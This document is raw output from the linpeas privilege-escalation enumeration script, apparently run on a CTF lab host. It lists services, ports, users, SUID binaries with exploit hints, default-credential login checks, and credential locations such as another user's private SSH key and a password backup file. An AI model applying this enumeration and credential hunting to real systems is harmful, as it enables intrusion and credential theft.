48K -rwxr-xr-x 1 root root 47K Apr 8 2016 /usr/sbin/acpid
648K -rwxr-xr-x 1 root root 647K Sep 18 2017 /usr/sbin/apache2
28K -rwxr-xr-x 1 root root 27K Jan 14 2016 /usr/sbin/atd
44K -rwxr-xr-x 1 root root 44K Apr 5 2016 /usr/sbin/cron
244K -rwxr-xr-x 1 root root 243K Mar 7 2018 /usr/sbin/nmbd
588K -rwxr-xr-x 1 root root 586K Apr 5 2016 /usr/sbin/rsyslogd
72K -rwxr-xr-x 1 root root 71K Mar 7 2018 /usr/sbin/smbd
776K -rwxr-xr-x 1 root root 773K Jan 18 2018 /usr/sbin/sshd
[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-jobs
-rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 190 Apr 17 2018 popularity-contest
/etc/cron.daily:
total 64
drwxr-xr-x 2 root root 4096 Apr 19 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 1474 Jun 19 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
-rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
-rwxr-xr-x 1 root root 383 Mar 7 2016 samba
-rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
[+] Services
[i] Search for outdated versions
[ + ] acpid
[ + ] apache-htcacheclean
[ + ] apache2
[ + ] apparmor
[ + ] apport
[ + ] atd
[ - ] bootmisc.sh
[ - ] checkfs.sh
[ - ] checkroot-bootclean.sh
[ - ] checkroot.sh
[ + ] console-setup
[ + ] cron
[ - ] cryptdisks
[ - ] cryptdisks-early
[ + ] dbus
[ + ] grub-common
[ - ] hostname.sh
[ - ] hwclock.sh
[ + ] irqbalance
[ + ] iscsid
[ + ] keyboard-setup
[ - ] killprocs
[ + ] kmod
[ - ] lvm2
[ + ] lvm2-lvmetad
[ + ] lvm2-lvmpolld
[ + ] lxcfs
[ - ] lxd
[ + ] mdadm
[ - ] mdadm-waitidle
[ - ] mountall-bootclean.sh
[ - ] mountall.sh
[ - ] mountdevsubfs.sh
[ - ] mountkernfs.sh
[ - ] mountnfs-bootclean.sh
[ - ] mountnfs.sh
[ + ] networking
[ + ] nmbd
[ + ] ondemand
[ + ] open-iscsi
[ - ] open-vm-tools
[ - ] plymouth
[ - ] plymouth-log
[ + ] procps
[ + ] rc.local
[ + ] resolvconf
[ - ] rsync
[ + ] rsyslog
[ + ] samba
[ + ] samba-ad-dc
[ - ] screen-cleanup
[ - ] sendsigs
[ + ] smbd
[ + ] ssh
[ + ] udev
[ + ] ufw
[ - ] umountfs
[ - ] umountnfs.sh
[ - ] umountroot
[ + ] unattended-upgrades
[ + ] urandom
[ - ] uuidd
[ - ] x11-common
===================================( Network Information )====================================
[+] Hostname, hosts and DNS
basic2
127.0.0.1 localhost
127.0.1.1 basic2
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 10.0.0.2
search eu-west-1.compute.internal
[+] Content of /etc/inetd.conf
/etc/inetd.conf Not Found
[+] Networks and neighbours
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0 Link encap:Ethernet HWaddr 02:c6:6a:4e:79:1b
inet addr:10.10.131.121 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::c6:6aff:fe4e:791b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:17812 errors:0 dropped:0 overruns:0 frame:0
TX packets:17854 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2557460 (2.5 MB) TX bytes:4664918 (4.6 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:192 errors:0 dropped:0 overruns:0 frame:0
TX packets:192 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:14256 (14.2 KB) TX bytes:14256 (14.2 KB)
10.10.0.1 dev eth0 lladdr 02:c8:85:b5:5a:aa REACHABLE
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 10.10.0.1 0.0.0.0 UG 0 0 0 eth0
10.10.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0
[+] Iptables rules
iptables rules Not Found
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 4788 10.10.131.121:22 10.8.32.129:34902 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 :::8009 :::* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
udp 0 0 10.10.255.255:137 0.0.0.0:* -
udp 0 0 10.10.131.121:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.255.255:138 0.0.0.0:* -
udp 0 0 10.10.131.121:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
[+] Can I sniff with tcpdump?
No
====================================( Users Information )=====================================
[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#groups
uid=1001(jan) gid=1001(jan) groups=1001(jan)
[+] Do I have PGP keys?
gpg Not Found
[+] Clipboard or highlighted text?
xsel and xclip Not Found
[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
[+] Checking /etc/doas.conf
/etc/doas.conf Not Found
[+] Checking Pkexec policy
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
[+] Don forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
[+] Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
[+] Superusers
root:x:0:0:root:/root:/bin/bash
[+] Users with console
jan:x:1001:1001::/home/jan:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
root:x:0:0:root:/root:/bin/bash
[+] Login information
09:15:50 up 35 min, 1 user, load average: 0.01, 0.05, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jan pts/0 10.8.32.129 09:15 6.00s 0.02s 0.00s w
kay tty1 Wed Apr 18 09:20 - down (00:05)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:45 - 09:25 (19:39)
kay tty1 Wed Apr 18 09:02 - crash (-19:-16)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:27 - 09:25 (19:58)
kay tty1 Tue Apr 17 13:21 - crash (00:05)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:14 - 09:25 (20:10)
kay tty1 Tue Apr 17 13:05 - down (00:08)
reboot system boot 4.4.0-87-generic Tue Apr 17 13:00 - 13:14 (00:14)
wtmp begins Tue Apr 17 13:00:02 2018
[+] All users
_apt
backup
bin
daemon
dnsmasq
games
gnats
irc
jan
kay
list
lp
lxd
mail
man
messagebus
news
nobody
proxy
root
sshd
sync
syslog
systemd-bus-proxy
systemd-network
systemd-resolve
systemd-timesync
sys
tomcat9
uucp
uuidd
www-data
[+] Password policy
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
===================================( Software Information )===================================
[+] MySQL version
mysql Not Found
[+] MySQL connection using default root/root ........... No
[+] MySQL connection using root/toor ................... No
[+] MySQL connection using root/NOPASS ................. No
[+] Looking for mysql credentials and exec
Not Found
[+] PostgreSQL version and pgadmin credentials
Not Found
[+] PostgreSQL connection to template0 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template1 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template0 using pgsql/NOPASS ........... No
[+] PostgreSQL connection to template1 using pgsql/NOPASS ........... No
[+] Apache server info
Version: Server version: Apache/2.4.18 (Ubuntu)
Server built: 2017-09-18T15:09:02
[+] Looking for PHPCookies
Not Found
[+] Looking for Wordpress wp-config.php files
wp-config.php Not Found
[+] Looking for Tomcat users file
tomcat-users.xml Not Found
[+] Mongo information
Not Found
[+] Looking for supervisord configuration file
supervisord.conf Not Found
[+] Looking for cesi configuration file
cesi.conf Not Found
[+] Looking for Rsyncd config file
/usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
[+] Looking for Hostapd config file
hostapd.conf Not Found
[+] Looking for wifi conns file
Not Found
[+] Looking for Anaconda-ks config files
anaconda-ks.cfg Not Found
[+] Looking for .vnc directories and their passwd files
.vnc Not Found
[+] Looking for ldap directories and their hashes
/etc/ldap
The password hash is from the {SSHA} to 'structural'
[+] Looking for .ovpn files and credentials
.ovpn Not Found
[+] Looking for ssl/ssh files
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Private SSH keys found!:
/home/kay/.ssh/id_rsa
Looking inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
GSSAPIDelegateCredentials no
[+] Looking for unexpected auth lines in /etc/pam.d/sshd
No
[+] Looking for Cloud credentials (AWS, Azure, GC)
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/etc/exports Not Found
[+] Looking for kerberos conf files and tickets
[i] https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt
krb5.conf Not Found
tickets kerberos Not Found
klist Not Found
[+] Looking for Kibana yaml
kibana.yml Not Found
[+] Looking for logstash files
Not Found
[+] Looking for elasticsearch files
Not Found
[+] Looking for Vault-ssh files
vault-ssh-helper.hcl Not Found
[+] Looking for AD cached hashes
/var/lib/samba/private/secrets.tdb
[+] Looking for screen sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
No Sockets found in /var/run/screen/S-jan.
[+] Looking for tmux sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
tmux Not Found
[+] Looking for Couchdb directory
[+] Looking for redis.conf
[+] Looking for dovecot files
dovecot credentials Not Found
[+] Looking for mosquitto.conf
====================================( Interesting Files )=====================================
[+] SUID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/vim.basic
/usr/bin/pkexec ---> rhel_6/Also_check_groups_privileges_and_pkexec_policy
/usr/bin/newgrp ---> HP-UX_10.20
/usr/bin/chfn ---> SuSE_9.3/10
/usr/bin/sudo ---> /sudo$
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/passwd ---> Apple_Mac_OSX/Solaris/SPARC_8/9/Sun_Solaris_2.5.1_PAM
/bin/su
/bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others
/bin/ping6
/bin/umount ---> BSD/Linux[1996-08-13]
/bin/fusermount
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/ping
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/lib/snapd/snap-confine
/usr/bin/crontab
/usr/bin/bsd-write
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/expiry
/usr/bin/wall
/usr/bin/screen ---> GNU_Screen_4.5.0
/usr/bin/at
/usr/bin/mlocate
[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
[+] .sh files in path
/usr/bin/gettext.sh
[+] Files (scripts) in /etc/profile.d/
total 24
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 580 Nov 30 2017 apps-bin-path.sh
-rw-r--r-- 1 root root 663 May 18 2016 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
-rw-r--r-- 1 root root 1557 Apr 14 2016 Z97-byobu.sh
[+] Hashes inside passwd file? ........... No
[+] Can I read shadow files? ........... No
[+] Can I read root folder? ........... No
[+] Looking for root files in home dirs (limit 20)
/home
/home/jan
/home/jan/.lesshst
/home/kay/.viminfo
/home/kay/.lesshst
[+] Looking for root files in folders owned by me
-rw-r--r-- 1 root root 0 Apr 30 09:16 /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/cgroup.clone_children
-rw-r--r-- 1 root root 0 Apr 30 09:16 /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/notify_on_release
-rw-r--r-- 1 root root 0 Apr 30 09:16 /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/cgroup.clone_children
-rw-r--r-- 1 root root 0 Apr 30 09:16 /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/notify_on_release
[+] Readable files belonging to root and readable by me but not world readable
[+] Files inside /home/jan (limit 20)
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
[+] Files inside others home (limit 20)
/home/kay/.profile
/home/kay/.viminfo
/home/kay/.bashrc
/home/kay/.bash_history
/home/kay/.lesshst
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/home/kay/.bash_logout
/home/kay/.sudo_as_admin_successful
/home/kay/pass.bak
[+] Looking for installed mail applications
[+] Mails (limit 50)
[+] Backup files?
-rw-r--r-- 1 root root 128 Apr 17 2018 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 610 Apr 17 2018 /etc/xml/catalog.old
-rw-r--r-- 1 root root 673 Apr 17 2018 /etc/xml/xml-core.xml.old
-rw-r--r-- 1 root root 9542 Apr 19 2018 /etc/samba/smb.conf.bak
-rwxr-xr-x 1 root root 10504 Mar 14 2016 /usr/bin/tdbbackup.tdbtools
[+] Looking for tables inside readable .db/.sqlite files (limit 100)
-> Extracting tables from /var/lib/nssdb/key4.db (limit 20)
-> Extracting tables from /var/lib/nssdb/secmod.db (limit 20)
-> Extracting tables from /var/lib/nssdb/cert9.db (limit 20)
[+] Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Apr 18 2018 .
drwxr-xr-x 14 root root 4.0K Apr 18 2018 ..
drwxr-xr-x 3 root root 4.0K Apr 23 2018 html
/var/www/html:
total 16K
drwxr-xr-x 3 root root 4.0K Apr 23 2018 .
drwxr-xr-x 3 root root 4.0K Apr 18 2018 ..
[+] *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .gitconfig, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data
-rw-r--r-- 1 root root 2188 Aug 31 2015 /etc/bash.bashrc
-rw-r--r-- 1 root root 655 May 16 2017 /etc/skel/.profile
-rw-r--r-- 1 root root 3771 Aug 31 2015 /etc/skel/.bashrc
-rw-r--r-- 1 kay kay 655 Apr 17 2018 /home/kay/.profile
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 /home/kay/.bashrc
-rw-r--r-- 1 kay kay 0 Apr 17 2018 /home/kay/.sudo_as_admin_successful
-rw-r--r-- 1 root root 3106 Oct 22 2015 /usr/share/base-files/dot.bashrc
-rw-r--r-- 1 root root 3161 Apr 14 2016 /usr/share/byobu/profiles/bashrc
-rw-r--r-- 1 root root 870 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc
-rw-r--r-- 1 root root 1865 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc
[+] All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
798117 0 -rw-r--r-- 1 root root 0 Apr 18 2018 /etc/.java/.systemPrefs/.system.lock
798118 0 -rw-r--r-- 1 root root 0 Apr 18 2018 /etc/.java/.systemPrefs/.systemRootModFile
786927 4 -rw-r--r-- 1 root root 220 Aug 31 2015 /etc/skel/.bash_logout
786435 0 -rw------- 1 root root 0 Aug 1 2017 /etc/.pwd.lock
786494 4 -rw-r--r-- 1 root root 1391 Apr 17 2018 /etc/apparmor.d/cache/.features
395 0 -rw-r--r-- 1 root root 0 Apr 30 08:41 /run/network/.ifstate.lock
10038 4 -rw-r--r-- 1 root root 1319 Apr 17 2018 /var/lib/apparmor/profiles/.apparmor.md5sums
532802 4 -rw-r--r-- 1 root root 155 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
532809 4 -rw-r--r-- 1 root root 333 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.purgatory.ro.cmd
532806 4 -rw-r--r-- 1 root root 1374 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
532804 4 -rw-r--r-- 1 root root 1304 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.stack.o.cmd
532798 12 -rw-r--r-- 1 root root 9092 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.sha256.o.cmd
532807 4 -rw-r--r-- 1 root root 3615 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.purgatory.o.cmd
532800 4 -rw-r--r-- 1 root root 1324 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.entry64.o.cmd
532812 4 -rw-r--r-- 1 root root 3529 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.string.o.cmd
532820 4 -rw-r--r-- 1 root root 292 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
532830 4 -rw-r--r-- 1 root root 292 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd
532821 4 -rw-r--r-- 1 root root 402 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd
532817 4 -rw-r--r-- 1 root root 316 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd
532828 4 -rw-r--r-- 1 root root 320 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd
532840 4 -rw-r--r-- 1 root root 320 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd
532838 4 -rw-r--r-- 1 root root 315 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd
532835 4 -rw-r--r-- 1 root root 340 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd
532792 4 -rw-r--r-- 1 root root 146 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs.cmd
532793 4 -rw-r--r-- 1 root root 3342 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_common.o.cmd
532788 4 -rw-r--r-- 1 root root 3362 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_32.o.cmd
532789 4 -rw-r--r-- 1 root root 3362 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_64.o.cmd
532842 56 -rw-r--r-- 1 root root 54037 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/kernel/.asm-offsets.s.cmd
532845 4 -rw-r--r-- 1 root root 22 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.21135.d
532853 4 -rw-r--r-- 1 root root 3972 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.insert-sys-cert.cmd
532910 4 -rw-r--r-- 1 root root 2839 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/selinux/mdp/.mdp.cmd
532908 4 -rw-r--r-- 1 root root 3239 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/selinux/genheaders/.genheaders.cmd
532916 4 -rw-r--r-- 1 root root 1193 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/basic/.bin2c.cmd
532914 8 -rw-r--r-- 1 root root 4268 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/basic/.fixdep.cmd
532869 4 -rw-r--r-- 1 root root 2391 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.conmakehash.cmd
532867 4 -rw-r--r-- 1 root root 3253 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.asn1_compiler.cmd
532857 4 -rw-r--r-- 1 root root 153 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.genksyms.cmd
532862 4 -rw-r--r-- 1 root root 2719 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.genksyms.o.cmd
532866 4 -rw-r--r-- 1 root root 2481 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.parse.tab.o.cmd
532861 4 -rw-r--r-- 1 root root 3347 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.lex.lex.o.cmd
532870 4 -rw-r--r-- 1 root root 3387 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.recordmcount.cmd
532918 8 -rw-r--r-- 1 root root 4495 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.extract-cert.cmd
532919 4 -rw-r--r-- 1 root root 2380 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.kallsyms.cmd
532886 4 -rw-r--r-- 1 root root 3485 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.file2alias.o.cmd
532893 4 -rw-r--r-- 1 root root 104 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.elfconfig.h.cmd
532887 8 -rw-r--r-- 1 root root 4622 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.modpost.o.cmd
532894 8 -rw-r--r-- 1 root root 4451 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.sumversion.o.cmd
532897 8 -rw-r--r-- 1 root root 5191 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.devicetable-offsets.s.cmd
532898 4 -rw-r--r-- 1 root root 2537 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.mk_elfconfig.cmd
532901 4 -rw-r--r-- 1 root root 546 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.devicetable-offsets.h.cmd
532889 4 -rw-r--r-- 1 root root 129 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.modpost.cmd
532896 4 -rw-r--r-- 1 root root 2289 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.empty.o.cmd
532871 8 -rw-r--r-- 1 root root 5133 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.sign-file.cmd
532884 4 -rw-r--r-- 1 root root 3755 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.conf.o.cmd
532883 4 -rw-r--r-- 1 root root 110 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.conf.cmd
532879 8 -rw-r--r-- 1 root root 4917 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.zconf.tab.o.cmd
532872 4 -rw-r--r-- 1 root root 3568 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.sortextable.cmd
532844 188 -rw-r--r-- 1 root root 190243 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.config
535090 188 -rw-r--r-- 1 root root 190367 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.config.old
532847 4 -rw-r--r-- 1 root root 820 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.missing-syscalls.d
535088 16 -rw-r--r-- 1 root root 14210 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/kernel/.bounds.s.cmd
276476 4 -rw-r--r-- 1 root root 155 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
276482 4 -rw-r--r-- 1 root root 333 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.purgatory.ro.cmd
276488 4 -rw-r--r-- 1 root root 1379 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
276485 4 -rw-r--r-- 1 root root 1309 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.stack.o.cmd
276480 12 -rw-r--r-- 1 root root 9148 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.sha256.o.cmd
276484 4 -rw-r--r-- 1 root root 3615 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.purgatory.o.cmd
276487 4 -rw-r--r-- 1 root root 1329 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.entry64.o.cmd
276486 4 -rw-r--r-- 1 root root 3601 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.string.o.cmd
276459 4 -rw-r--r-- 1 root root 292 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
[+] Readable files inside /tmp, /var/tmp, /var/backups(limit 100)
-rwxr-xr-x 1 jan jan 134167 Apr 30 09:14 /tmp/linpeas.sh
-rw-r--r-- 1 root root 14659 Apr 23 2018 /var/backups/apt.extended_states.0
